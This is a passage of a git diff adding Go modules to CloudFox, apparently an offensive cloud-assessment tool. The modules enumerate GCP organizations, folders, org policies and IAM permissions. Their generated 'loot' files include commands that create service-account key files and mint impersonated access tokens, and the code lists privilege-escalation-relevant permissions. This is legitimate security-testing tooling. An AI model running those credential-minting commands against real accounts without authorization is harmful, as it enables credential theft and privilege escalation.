[][]orgsservice.HierarchyNode{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *OrganizationsModule) Execute(ctx context.Context, logger internal.Logger) { + orgsSvc := orgsservice.New() + + // Get organizations + orgs, err := orgsSvc.SearchOrganizations() + if err != nil { + logger.InfoM(fmt.Sprintf("Could not enumerate organizations: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + } else { + m.Organizations = orgs + } + + // Get all folders + folders, err := orgsSvc.SearchAllFolders() + if err != nil { + logger.InfoM(fmt.Sprintf("Could not enumerate folders: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + } else { + m.Folders = folders + } + + // Get all projects + projects, err := orgsSvc.SearchProjects("") + if err != nil { + logger.InfoM(fmt.Sprintf("Could not enumerate projects: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + } else { + m.Projects = projects + } + + // Get ancestry for each specified project + for _, projectID := range m.ProjectIDs { + ancestry, err := orgsSvc.GetProjectAncestry(projectID) + if err != nil { + logger.InfoM(fmt.Sprintf("Could not get ancestry for project %s: %v", projectID, err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + } else { + m.Ancestry = append(m.Ancestry, ancestry) + } + } + + // Generate loot + m.generateLoot() + + // Report findings + logger.SuccessM(fmt.Sprintf("Found %d organization(s), %d folder(s), %d project(s)", + len(m.Organizations), len(m.Folders), len(m.Projects)), globals.GCP_ORGANIZATIONS_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *OrganizationsModule) initializeLootFiles() { + m.LootMap["organizations-commands"] = &internal.LootFile{ + Name: "organizations-commands", + Contents: "# GCP Organization Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *OrganizationsModule) generateLoot() { + // Hierarchy visualization + m.LootMap["organizations-commands"].Contents += "# ==========================================\n" + m.LootMap["organizations-commands"].Contents += "# ORGANIZATION HIERARCHY\n" + m.LootMap["organizations-commands"].Contents += "# ==========================================\n\n" + + for _, org := range m.Organizations { + orgID := strings.TrimPrefix(org.Name, "organizations/") + m.LootMap["organizations-commands"].Contents += fmt.Sprintf("Organization: %s (%s)\n", org.DisplayName, orgID) + + // Find folders directly under this org + for _, folder := range m.Folders { + if folder.Parent == org.Name { + m.addFolderToHierarchy(folder, 1) + } + } + + // Find projects directly under this org + for _, proj := range m.Projects { + if proj.Parent == org.Name { + m.LootMap["organizations-commands"].Contents += fmt.Sprintf(" └── Project: %s (%s)\n", proj.DisplayName, proj.ProjectID) + } + } + m.LootMap["organizations-commands"].Contents += "\n" + } + + // Gcloud commands for organizations + m.LootMap["organizations-commands"].Contents += "# ==========================================\n" + m.LootMap["organizations-commands"].Contents += "# ORGANIZATION COMMANDS\n" + m.LootMap["organizations-commands"].Contents += "# ==========================================\n\n" + + for _, org := range m.Organizations { + orgID := strings.TrimPrefix(org.Name, "organizations/") + m.LootMap["organizations-commands"].Contents += fmt.Sprintf( + "## Organization: %s (%s)\n"+ + "gcloud organizations describe %s\n"+ + "gcloud organizations get-iam-policy %s\n"+ + "gcloud resource-manager folders list --organization=%s\n"+ + "gcloud projects list --filter='parent.id=%s'\n\n", + org.DisplayName, orgID, + orgID, + orgID, + orgID, + orgID, + ) + } + + // Gcloud commands for folders + if len(m.Folders) > 0 { + m.LootMap["organizations-commands"].Contents += "# ==========================================\n" + m.LootMap["organizations-commands"].Contents += "# FOLDER COMMANDS\n" + m.LootMap["organizations-commands"].Contents += "# ==========================================\n\n" + + for _, folder := range m.Folders { + folderID := strings.TrimPrefix(folder.Name, "folders/") + m.LootMap["organizations-commands"].Contents += fmt.Sprintf( + "## Folder: %s (%s)\n"+ + "gcloud resource-manager folders describe %s\n"+ + "gcloud resource-manager folders get-iam-policy %s\n"+ + "gcloud resource-manager folders list --folder=%s\n"+ + "gcloud projects list --filter='parent.id=%s'\n\n", + folder.DisplayName, folderID, + folderID, + folderID, + folderID, + folderID, + ) + } + } +} + +func (m *OrganizationsModule) addFolderToHierarchy(folder orgsservice.FolderInfo, depth int) { + indent := strings.Repeat(" ", depth) + folderID := strings.TrimPrefix(folder.Name, "folders/") + m.LootMap["organizations-commands"].Contents += fmt.Sprintf("%s├── Folder: %s (%s)\n", indent, folder.DisplayName, folderID) + + // Find child folders + for _, childFolder := range m.Folders { + if childFolder.Parent == folder.Name { + m.addFolderToHierarchy(childFolder, depth+1) + } + } + + // Find projects under this folder + for _, proj := range m.Projects { + if proj.Parent == folder.Name { + m.LootMap["organizations-commands"].Contents += fmt.Sprintf("%s └── Project: %s (%s)\n", indent, proj.DisplayName, proj.ProjectID) + } + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *OrganizationsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Organizations table + orgsHeader := []string{ + "Organization ID", + "Display Name", + "State", + "Directory ID", + } + + var orgsBody [][]string + for _, org := range m.Organizations { + orgID := strings.TrimPrefix(org.Name, "organizations/") + orgsBody = append(orgsBody, []string{ + orgID, + org.DisplayName, + org.State, + org.DirectoryID, + }) + } + + // Folders table + foldersHeader := []string{ + "Folder ID", + "Display Name", + "Parent", + "State", + } + + var foldersBody [][]string + for _, folder := range m.Folders { + folderID := strings.TrimPrefix(folder.Name, "folders/") + foldersBody = append(foldersBody, []string{ + folderID, + folder.DisplayName, + folder.Parent, + folder.State, + }) + } + + // Projects table + projectsHeader := []string{ + "Project ID", + "Project Name", + "Display Name", + "Parent", + "State", + } + + var projectsBody [][]string + for _, proj := range m.Projects { + projectsBody = append(projectsBody, []string{ + proj.ProjectID, + m.GetProjectName(proj.ProjectID), + proj.DisplayName, + proj.Parent, + proj.State, + }) + } + + // Ancestry table + ancestryHeader := []string{ + "Project ID", + "Project Name", + "Ancestry Path", + } + + var ancestryBody [][]string + for _, ancestry := range m.Ancestry { + if len(ancestry) > 0 { + // Build ancestry path string + var path []string + projectID := "" + for _, node := range ancestry { + if node.Type == "project" { + projectID = node.ID + } + path = append(path, fmt.Sprintf("%s:%s", node.Type, node.ID)) + } + ancestryBody = append(ancestryBody, []string{ + projectID, + m.GetProjectName(projectID), + strings.Join(path, " -> "), + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + var tables []internal.TableFile + + if len(orgsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "organizations", + Header: orgsHeader, + Body: orgsBody, + }) + } + + if len(foldersBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "folders", + Header: foldersHeader, + Body: foldersBody, + }) + } + + if len(projectsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "projects", + Header: projectsHeader, + Body: projectsBody, + }) + } + + if len(ancestryBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "ancestry", + Header: ancestryHeader, + Body: ancestryBody, + }) + } + + output := OrganizationsOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/orgpolicies.go b/gcp/commands/orgpolicies.go new file mode 100644 index 00000000..9f9d961b --- /dev/null +++ b/gcp/commands/orgpolicies.go @@ -0,0 +1,239 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + orgpolicyservice "github.com/BishopFox/cloudfox/gcp/services/orgpolicyService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPOrgPoliciesCommand = &cobra.Command{ + Use: globals.GCP_ORGPOLICIES_MODULE_NAME, + Aliases: []string{"orgpolicy", "policies"}, + Short: "Enumerate organization policies and identify security weaknesses", + Long: `Enumerate GCP organization policies to identify security configuration weaknesses. + +Organization policies control security constraints across GCP resources. This module +identifies policies that may be misconfigured or weakened, creating security risks. + +Security-Relevant Policies Analyzed: +- Domain restrictions (iam.allowedPolicyMemberDomains) +- Service account key controls (iam.disableServiceAccountKeyCreation) +- Workload identity restrictions +- Compute security (Shielded VM, OS Login, external IPs) +- Storage security (public access, uniform access) +- SQL security (public IPs, authorized networks) +- GKE security (public endpoints) +- Resource location restrictions + +Risk Indicators: +- AllowAll: Policy allows any value (HIGH risk) +- Wildcard patterns: Overly permissive allowed values +- Unenforced: Security constraint not enabled +- Override: Project overrides parent restrictions`, + Run: runGCPOrgPoliciesCommand, +} + +type OrgPoliciesModule struct { + gcpinternal.BaseGCPModule + Policies []orgpolicyservice.OrgPolicyInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type OrgPoliciesOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o OrgPoliciesOutput) TableFiles() []internal.TableFile { return o.Table } +func (o OrgPoliciesOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPOrgPoliciesCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ORGPOLICIES_MODULE_NAME) + if err != nil { + return + } + + module := &OrgPoliciesModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Policies: []orgpolicyservice.OrgPolicyInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *OrgPoliciesModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ORGPOLICIES_MODULE_NAME, m.processProject) + + if len(m.Policies) == 0 { + logger.InfoM("No organization policies found (may require orgpolicy.policies.list permission)", globals.GCP_ORGPOLICIES_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d organization policy(ies)", len(m.Policies)), globals.GCP_ORGPOLICIES_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *OrgPoliciesModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating org policies in project: %s", projectID), globals.GCP_ORGPOLICIES_MODULE_NAME) + } + + svc := orgpolicyservice.New() + policies, err := svc.ListProjectPolicies(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_ORGPOLICIES_MODULE_NAME, + fmt.Sprintf("Could not enumerate org policies in project %s", projectID)) + return + } + + m.mu.Lock() + m.Policies = append(m.Policies, policies...) + for _, policy := range policies { + m.addPolicyToLoot(policy) + } + m.mu.Unlock() +} + +func (m *OrgPoliciesModule) initializeLootFiles() { + m.LootMap["orgpolicies-commands"] = &internal.LootFile{ + Name: "orgpolicies-commands", + Contents: "# Organization Policy Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *OrgPoliciesModule) addPolicyToLoot(policy orgpolicyservice.OrgPolicyInfo) { + // Extract short constraint name for commands + constraintName := policy.Constraint + if strings.HasPrefix(constraintName, "constraints/") { + constraintName = strings.TrimPrefix(constraintName, "constraints/") + } + + m.LootMap["orgpolicies-commands"].Contents += fmt.Sprintf( + "## Constraint: %s (Project: %s)\n", + policy.Constraint, policy.ProjectID, + ) + + if policy.Description != "" { + m.LootMap["orgpolicies-commands"].Contents += fmt.Sprintf("# Description: %s\n", policy.Description) + } + + m.LootMap["orgpolicies-commands"].Contents += fmt.Sprintf( + "# Enforced: %s, AllowAll: %s, DenyAll: %s, Inherit: %s\n", + boolToYesNo(policy.Enforced), + boolToYesNo(policy.AllowAll), + boolToYesNo(policy.DenyAll), + boolToYesNo(policy.InheritParent), + ) + + if len(policy.AllowedValues) > 0 { + m.LootMap["orgpolicies-commands"].Contents += fmt.Sprintf("# Allowed Values: %s\n", strings.Join(policy.AllowedValues, ", ")) + } + if len(policy.DeniedValues) > 0 { + m.LootMap["orgpolicies-commands"].Contents += fmt.Sprintf("# Denied Values: %s\n", strings.Join(policy.DeniedValues, ", ")) + } + + m.LootMap["orgpolicies-commands"].Contents += fmt.Sprintf( + "\n# Describe this policy:\n"+ + "gcloud org-policies describe %s --project=%s\n\n"+ + "# Get effective policy (includes inheritance):\n"+ + "gcloud org-policies describe %s --project=%s --effective\n\n", + constraintName, policy.ProjectID, + constraintName, policy.ProjectID, + ) +} + +func (m *OrgPoliciesModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main policies table + header := []string{ + "Project Name", + "Project ID", + "Constraint", + "Description", + "Enforced", + "Allow All", + "Deny All", + "Inherit", + "Allowed Values", + "Denied Values", + } + + var body [][]string + for _, policy := range m.Policies { + description := policy.Description + if description == "" { + description = "-" + } + + allowedValues := "-" + if len(policy.AllowedValues) > 0 { + allowedValues = strings.Join(policy.AllowedValues, ", ") + } + + deniedValues := "-" + if len(policy.DeniedValues) > 0 { + deniedValues = strings.Join(policy.DeniedValues, ", ") + } + + body = append(body, []string{ + m.GetProjectName(policy.ProjectID), + policy.ProjectID, + policy.Constraint, + description, + boolToYesNo(policy.Enforced), + boolToYesNo(policy.AllowAll), + boolToYesNo(policy.DenyAll), + boolToYesNo(policy.InheritParent), + allowedValues, + deniedValues, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: "orgpolicies", + Header: header, + Body: body, + }, + } + + output := OrgPoliciesOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ORGPOLICIES_MODULE_NAME) + } +} diff --git a/gcp/commands/permissions.go b/gcp/commands/permissions.go new file mode 100644 index 00000000..c3ec89b0 --- /dev/null +++ b/gcp/commands/permissions.go @@ -0,0 +1,740 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + orgsservice "github.com/BishopFox/cloudfox/gcp/services/organizationsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPPermissionsCommand = &cobra.Command{ + Use: globals.GCP_PERMISSIONS_MODULE_NAME, + Aliases: []string{"perms", "privs"}, + Short: "Enumerate ALL permissions for each IAM entity with full inheritance explosion", + Long: `Enumerate ALL permissions for each IAM entity with complete inheritance explosion. + +This module provides COMPLETE permission visibility by: +- Enumerating organization-level IAM bindings (top of hierarchy) +- Enumerating folder-level IAM bindings (inherited to child resources) +- Enumerating project-level IAM bindings (resource-specific) +- EXPLODING every role into its individual permissions (one line per permission) +- Tracking the exact inheritance source for each permission +- Expanding group memberships to show inherited permissions +- Identifying cross-project access patterns +- Flagging dangerous/privesc permissions + +Output: Single unified table with one row per permission entry.`, + Run: runGCPPermissionsCommand, +} + +// High-privilege permission prefixes that should be flagged +var highPrivilegePermissionPrefixes = []string{ + "iam.serviceAccounts.actAs", + "iam.serviceAccounts.getAccessToken", + "iam.serviceAccounts.getOpenIdToken", + "iam.serviceAccounts.implicitDelegation", + "iam.serviceAccounts.signBlob", + "iam.serviceAccounts.signJwt", + "iam.serviceAccountKeys.create", + "iam.roles.create", + "iam.roles.update", + "resourcemanager.projects.setIamPolicy", + "resourcemanager.folders.setIamPolicy", + "resourcemanager.organizations.setIamPolicy", + "compute.instances.setMetadata", + "compute.instances.setServiceAccount", + "compute.projects.setCommonInstanceMetadata", + "storage.buckets.setIamPolicy", + "storage.objects.setIamPolicy", + "cloudfunctions.functions.setIamPolicy", + "run.services.setIamPolicy", + "secretmanager.secrets.setIamPolicy", + "deploymentmanager.deployments.create", + "cloudbuild.builds.create", + "container.clusters.getCredentials", + "orgpolicy.policy.set", +} + +// ExplodedPermission represents a single permission entry with full context +type ExplodedPermission struct { + Entity string + EntityType string + EntityEmail string + Permission string + Role string + RoleType string + ResourceScope string + ResourceScopeType string + ResourceScopeID string + ResourceScopeName string + InheritedFrom string + IsInherited bool + HasCondition bool + Condition string + ConditionTitle string + EffectiveProject string + ProjectName string + IsCrossProject bool + SourceProject string + IsHighPrivilege bool +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type PermissionsModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + ExplodedPerms []ExplodedPermission + EntityPermissions []IAMService.EntityPermissions + GroupInfos []IAMService.GroupInfo + OrgBindings []IAMService.PolicyBinding + FolderBindings map[string][]IAMService.PolicyBinding + LootMap map[string]*internal.LootFile + mu sync.Mutex + + // Organization info for output path + OrgIDs []string + OrgNames map[string]string +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type PermissionsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o PermissionsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o PermissionsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPPermissionsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_PERMISSIONS_MODULE_NAME) + if err != nil { + return + } + + module := &PermissionsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ExplodedPerms: []ExplodedPermission{}, + EntityPermissions: []IAMService.EntityPermissions{}, + GroupInfos: []IAMService.GroupInfo{}, + OrgBindings: []IAMService.PolicyBinding{}, + FolderBindings: make(map[string][]IAMService.PolicyBinding), + LootMap: make(map[string]*internal.LootFile), + OrgIDs: []string{}, + OrgNames: make(map[string]string), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *PermissionsModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Enumerating ALL permissions with full inheritance explosion...", globals.GCP_PERMISSIONS_MODULE_NAME) + logger.InfoM("This includes organization, folder, and project-level bindings", globals.GCP_PERMISSIONS_MODULE_NAME) + + // First, try to enumerate organization-level bindings + m.enumerateOrganizationBindings(ctx, logger) + + // Run project enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_PERMISSIONS_MODULE_NAME, m.processProject) + + if len(m.ExplodedPerms) == 0 { + logger.InfoM("No permissions found", globals.GCP_PERMISSIONS_MODULE_NAME) + return + } + + // Count statistics + uniqueEntities := make(map[string]bool) + uniquePerms := make(map[string]bool) + inheritedCount := 0 + crossProjectCount := 0 + highPrivCount := 0 + + for _, ep := range m.ExplodedPerms { + uniqueEntities[ep.Entity] = true + uniquePerms[ep.Permission] = true + if ep.IsInherited { + inheritedCount++ + } + if ep.IsCrossProject { + crossProjectCount++ + } + if ep.IsHighPrivilege { + highPrivCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Exploded %d total permission entries for %d entities", + len(m.ExplodedPerms), len(uniqueEntities)), globals.GCP_PERMISSIONS_MODULE_NAME) + logger.InfoM(fmt.Sprintf("Unique permissions: %d | Inherited: %d | Cross-project: %d | High-privilege: %d", + len(uniquePerms), inheritedCount, crossProjectCount, highPrivCount), globals.GCP_PERMISSIONS_MODULE_NAME) + + if len(m.GroupInfos) > 0 { + groupsEnumerated := 0 + for _, gi := range m.GroupInfos { + if gi.MembershipEnumerated { + groupsEnumerated++ + } + } + logger.InfoM(fmt.Sprintf("Found %d group(s), enumerated membership for %d", len(m.GroupInfos), groupsEnumerated), globals.GCP_PERMISSIONS_MODULE_NAME) + + unenumeratedGroups := len(m.GroupInfos) - groupsEnumerated + if unenumeratedGroups > 0 { + logger.InfoM(fmt.Sprintf("[WARNING] Could not enumerate membership for %d group(s) - permissions inherited via these groups are NOT visible!", unenumeratedGroups), globals.GCP_PERMISSIONS_MODULE_NAME) + } + } + + m.writeOutput(ctx, logger) +} + +// enumerateOrganizationBindings tries to get organization-level IAM bindings +func (m *PermissionsModule) enumerateOrganizationBindings(ctx context.Context, logger internal.Logger) { + orgsSvc := orgsservice.New() + + if len(m.ProjectIDs) > 0 { + iamSvc := IAMService.New() + + bindings, err := iamSvc.PoliciesWithInheritance(m.ProjectIDs[0]) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not get inherited policies: %v", err), globals.GCP_PERMISSIONS_MODULE_NAME) + } + return + } + + for _, binding := range bindings { + if binding.ResourceType == "organization" { + m.mu.Lock() + m.OrgBindings = append(m.OrgBindings, binding) + // Track org IDs + if !contains(m.OrgIDs, binding.ResourceID) { + m.OrgIDs = append(m.OrgIDs, binding.ResourceID) + m.OrgNames[binding.ResourceID] = binding.ResourceID // Use ID as name for now + } + m.mu.Unlock() + } else if binding.ResourceType == "folder" { + m.mu.Lock() + m.FolderBindings[binding.ResourceID] = append(m.FolderBindings[binding.ResourceID], binding) + m.mu.Unlock() + } + } + + if len(m.OrgBindings) > 0 { + logger.InfoM(fmt.Sprintf("Found %d organization-level IAM binding(s)", len(m.OrgBindings)), globals.GCP_PERMISSIONS_MODULE_NAME) + } + + totalFolderBindings := 0 + for _, bindings := range m.FolderBindings { + totalFolderBindings += len(bindings) + } + if totalFolderBindings > 0 { + logger.InfoM(fmt.Sprintf("Found %d folder-level IAM binding(s) across %d folder(s)", totalFolderBindings, len(m.FolderBindings)), globals.GCP_PERMISSIONS_MODULE_NAME) + } + } + + _ = orgsSvc +} + +func contains(slice []string, item string) bool { + for _, s := range slice { + if s == item { + return true + } + } + return false +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *PermissionsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating permissions in project: %s", projectID), globals.GCP_PERMISSIONS_MODULE_NAME) + } + + iamService := IAMService.New() + entityPerms, groupInfos, err := iamService.GetAllEntityPermissionsWithGroupExpansion(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_PERMISSIONS_MODULE_NAME, + fmt.Sprintf("Could not enumerate permissions in project %s", projectID)) + return + } + + var explodedPerms []ExplodedPermission + for _, ep := range entityPerms { + for _, perm := range ep.Permissions { + isHighPriv := isHighPrivilegePermission(perm.Permission) + + exploded := ExplodedPermission{ + Entity: ep.Entity, + EntityType: ep.EntityType, + EntityEmail: ep.Email, + Permission: perm.Permission, + Role: perm.Role, + RoleType: perm.RoleType, + ResourceScope: fmt.Sprintf("%s/%s", perm.ResourceType, perm.ResourceID), + ResourceScopeType: perm.ResourceType, + ResourceScopeID: perm.ResourceID, + ResourceScopeName: m.getScopeName(perm.ResourceType, perm.ResourceID), + IsInherited: perm.IsInherited, + InheritedFrom: perm.InheritedFrom, + HasCondition: perm.HasCondition, + Condition: perm.Condition, + EffectiveProject: projectID, + ProjectName: m.GetProjectName(projectID), + IsHighPrivilege: isHighPriv, + } + + // Parse condition title if present + if perm.HasCondition && perm.Condition != "" { + exploded.ConditionTitle = parseConditionTitle(perm.Condition) + } + + // Detect cross-project access + if ep.EntityType == "ServiceAccount" { + parts := strings.Split(ep.Email, "@") + if len(parts) == 2 { + saParts := strings.Split(parts[1], ".") + if len(saParts) >= 1 { + saProject := saParts[0] + if saProject != projectID { + exploded.IsCrossProject = true + exploded.SourceProject = saProject + } + } + } + } + + explodedPerms = append(explodedPerms, exploded) + } + } + + m.mu.Lock() + m.ExplodedPerms = append(m.ExplodedPerms, explodedPerms...) + m.EntityPermissions = append(m.EntityPermissions, entityPerms...) + m.GroupInfos = append(m.GroupInfos, groupInfos...) + + // Generate loot + for _, ep := range entityPerms { + m.addEntityToLoot(ep) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Exploded %d permission entries in project %s", len(explodedPerms), projectID), globals.GCP_PERMISSIONS_MODULE_NAME) + } +} + +func (m *PermissionsModule) getScopeName(scopeType, scopeID string) string { + switch scopeType { + case "project": + return m.GetProjectName(scopeID) + case "organization": + if name, ok := m.OrgNames[scopeID]; ok { + return name + } + return scopeID + case "folder": + return scopeID // Could be enhanced to lookup folder names + default: + return scopeID + } +} + +func parseConditionTitle(condition string) string { + // Try to extract title from condition if it looks like a struct + if strings.Contains(condition, "title:") { + parts := strings.Split(condition, "title:") + if len(parts) > 1 { + titlePart := strings.TrimSpace(parts[1]) + if idx := strings.Index(titlePart, " "); idx > 0 { + return titlePart[:idx] + } + return titlePart + } + } + return "" +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *PermissionsModule) initializeLootFiles() { + m.LootMap["permissions-commands"] = &internal.LootFile{ + Name: "permissions-commands", + Contents: "# GCP Permissions Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *PermissionsModule) addEntityToLoot(ep IAMService.EntityPermissions) { + // Only add service accounts with high-privilege permissions + hasHighPriv := false + var highPrivPerms []string + + for _, perm := range ep.Permissions { + if isHighPrivilegePermission(perm.Permission) { + hasHighPriv = true + highPrivPerms = append(highPrivPerms, perm.Permission) + } + } + + if ep.EntityType == "ServiceAccount" { + if hasHighPriv { + m.LootMap["permissions-commands"].Contents += fmt.Sprintf( + "# Service Account: %s [HIGH PRIVILEGE]\n"+ + "# High-privilege permissions: %s\n"+ + "# Roles: %s\n", + ep.Email, + strings.Join(highPrivPerms, ", "), + strings.Join(ep.Roles, ", "), + ) + } else { + m.LootMap["permissions-commands"].Contents += fmt.Sprintf( + "# Service Account: %s\n"+ + "# Roles: %s\n", + ep.Email, + strings.Join(ep.Roles, ", "), + ) + } + + m.LootMap["permissions-commands"].Contents += fmt.Sprintf( + "gcloud iam service-accounts describe %s --project=%s\n"+ + "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n"+ + "gcloud iam service-accounts get-iam-policy %s --project=%s\n"+ + "gcloud iam service-accounts keys create ./key.json --iam-account=%s --project=%s\n"+ + "gcloud auth print-access-token --impersonate-service-account=%s\n\n", + ep.Email, ep.ProjectID, + ep.Email, ep.ProjectID, + ep.Email, ep.ProjectID, + ep.Email, ep.ProjectID, + ep.Email, + ) + } +} + +// isHighPrivilegePermission checks if a permission is considered high-privilege +func isHighPrivilegePermission(permission string) bool { + for _, prefix := range highPrivilegePermissionPrefixes { + if strings.HasPrefix(permission, prefix) { + return true + } + } + return false +} + +// PermFederatedIdentityInfo contains parsed information about a federated identity +type PermFederatedIdentityInfo struct { + IsFederated bool + ProviderType string // AWS, GitHub, GitLab, OIDC, SAML, Azure, etc. + PoolName string + Subject string + Attribute string +} + +// parsePermFederatedIdentity detects and parses federated identity principals +func parsePermFederatedIdentity(identity string) PermFederatedIdentityInfo { + info := PermFederatedIdentityInfo{} + + // Check for principal:// or principalSet:// format + if !strings.HasPrefix(identity, "principal://") && !strings.HasPrefix(identity, "principalSet://") { + return info + } + + info.IsFederated = true + + // Extract pool name if present + if strings.Contains(identity, "workloadIdentityPools/") { + parts := strings.Split(identity, "workloadIdentityPools/") + if len(parts) > 1 { + poolParts := strings.Split(parts[1], "/") + if len(poolParts) > 0 { + info.PoolName = poolParts[0] + } + } + } + + // Detect provider type based on common patterns + identityLower := strings.ToLower(identity) + + switch { + case strings.Contains(identityLower, "aws") || strings.Contains(identityLower, "amazon"): + info.ProviderType = "AWS" + case strings.Contains(identityLower, "github"): + info.ProviderType = "GitHub" + case strings.Contains(identityLower, "gitlab"): + info.ProviderType = "GitLab" + case strings.Contains(identityLower, "azure") || strings.Contains(identityLower, "microsoft"): + info.ProviderType = "Azure" + case strings.Contains(identityLower, "okta"): + info.ProviderType = "Okta" + case strings.Contains(identityLower, "bitbucket"): + info.ProviderType = "Bitbucket" + case strings.Contains(identityLower, "circleci"): + info.ProviderType = "CircleCI" + case strings.Contains(identity, "attribute."): + info.ProviderType = "OIDC" + default: + info.ProviderType = "Federated" + } + + // Extract subject if present + // Format: .../subject/{subject} + if strings.Contains(identity, "/subject/") { + parts := strings.Split(identity, "/subject/") + if len(parts) > 1 { + info.Subject = parts[1] + } + } + + // Extract attribute and value if present + // Format: .../attribute.{attr}/{value} + if strings.Contains(identity, "/attribute.") { + parts := strings.Split(identity, "/attribute.") + if len(parts) > 1 { + attrParts := strings.Split(parts[1], "/") + if len(attrParts) >= 1 { + info.Attribute = attrParts[0] + } + if len(attrParts) >= 2 { + // The value is the specific identity (e.g., repo name) + info.Subject = attrParts[1] + } + } + } + + return info +} + +// 